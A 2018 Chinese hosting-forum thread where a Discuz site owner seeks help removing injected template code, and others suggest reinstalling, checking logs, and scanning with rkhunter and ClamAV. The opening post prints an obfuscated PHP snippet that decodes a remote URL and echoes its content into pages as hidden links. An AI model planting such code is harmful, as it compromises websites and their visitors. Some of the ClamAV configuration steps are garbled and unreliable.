全球主机交流论坛

标题: 大佬们，这个马在哪儿哪儿清除？ [打印本页]

---

作者: 坐怀不乱西门庆    时间: 2018-1-4 13:19
标题: 大佬们，这个马在哪儿哪儿清除？
模版文件下多了这些

1. <!--{eval}-->
   
2. <!--
   
3. if(!$_SERVER['QUERY_STRING']){
   
4.         $vars = 'b'.'a'.'s'.'e'.'6'.'4'.'_'.'d'.'e'.'c'.'o'.'d'.'e';
   
5.         echo file_get_contents($vars("aHR0cDovLzE4My42MC4xMTEuMTczOjgwODAvbGluay9nYmsuaHRtbA=="));
   
6. }
   
7. -->
   
8. <!--{/eval}-->

复制代码

DZ论坛被挂黑链，同VPS另一个网站也被挂，root用户早已经改了端口号

您好，请联系您的程序人员检查一下网站代码是否存在漏洞，这边不是程序人员，无法协助您操作，请见谅！为了更好的为您提供优质的服务，烦请您在百忙之中抽空对该工单做出评价，感谢您的配合!

---

作者: leaveoff    时间: 2018-1-4 13:25
找个软件可以批量清除 。。。几秒就搞定了。。。

---

作者: 坐怀不乱西门庆    时间: 2018-1-4 13:37

leaveoff 发表于 2018-1-4 13:25
找个软件可以批量清除 。。。几秒就搞定了。。。

删这行没问题而且很简单，不知道是从哪儿来的，删了再被加上

---

作者: 我是人    时间: 2018-1-4 13:48
重装。

被挂rootkit的话，没有其他办法。。。

---

作者: hxuf    时间: 2018-1-4 13:53
你是怎么发现的

---

作者: 坐怀不乱西门庆    时间: 2018-1-4 13:59

我是人 发表于 2018-1-4 13:48
重装。

被挂rootkit的话，没有其他办法。。。

我是说我早已经把自己的端口改了，挂马的人似乎不是通过root进去的

---

作者: funders    时间: 2018-1-4 15:30
看web日志是如何被黑的

---

作者: 坐怀不乱西门庆    时间: 2018-1-4 17:02
删了又自动生成

---

作者: Ruclinux    时间: 2018-1-4 18:54
看服务项目里有没有可疑脚本或启动项
看进程里有没有可疑进程
安装个rkhunter进行扫描
安装个clamav进行扫描

---

作者: 坐怀不乱西门庆    时间: 2018-1-8 15:41

Ruclinux 发表于 2018-1-4 18:54
看服务项目里有没有可疑脚本或启动项
看进程里有没有可疑进程
安装个rkhunter进行扫描

这两个有小白文档没？前两天恢复了镜像不到一天又被日了

---

作者: Ruclinux    时间: 2018-1-8 20:55
rkhunter安装使用
http://rkhunter.sourceforge.net/
wget https://nchc.dl.sourceforge.net/project/rkhunter/rkhunter/1.4.4/rkhunter-1.4.4.tar.gz
tar -xzvf rkhunter-1.4.4.tar.gz
cd rkhunter-1.4.4
./installer.sh

使用
sudo rkhunter --update
sudo rkhunter - check
or
sudo rkhunter -c

更多使用方法请参考文件目录中的 files/README

Clamav安装和使用
sudo yum install gcc openssl openssl-devel  -y
http://www.clamav.net/
wget http://www.clamav.net/downloads/beta/clamav-0.99.3-beta2.tar.gz
tar -xzvf clamav-0.99.3-beta2.tar.gz
cd clamav-0.99.3-beta2
./configure && make && make install
将安装目录下的clamd.conf.sample freshclam.conf.sample 重命名为clamd.conf freshclam.conf 然后编辑配置文件即可以正常使用.
find / -name clamd.conf.sample
find / -name freshclam.conf.sample
用mv命令将找到的配置文件更名为 “去除掉后缀名中的sample”

打开freshclam.conf
#Example    注释掉这一行. 去除下面几行的注释
LogFile/usr/local/clamav/logs/clamd.log   
PidFile/usr/local/clamav/updata/clamd.pid     
DatabaseDirectory/usr/local/clamav/updata

打开clamd.conf
#Example    注释掉这一行.  去除下面几行的注释
DatabaseDirectory/usr/local/clamav/updata
UpdateLogFile/usr/local/clamav/logs/freshclam.log
PidFile/usr/local/clamav/updata/freshclam.pid

freshclam

clamscan -r –bell -i /

---

作者: Ruclinux    时间: 2018-1-8 20:58
排除了服务器漏洞，你要看看是不是程序漏洞。

---

欢迎光临 全球主机交流论坛 (https://443502.xyz/)

Powered by Discuz! X3.4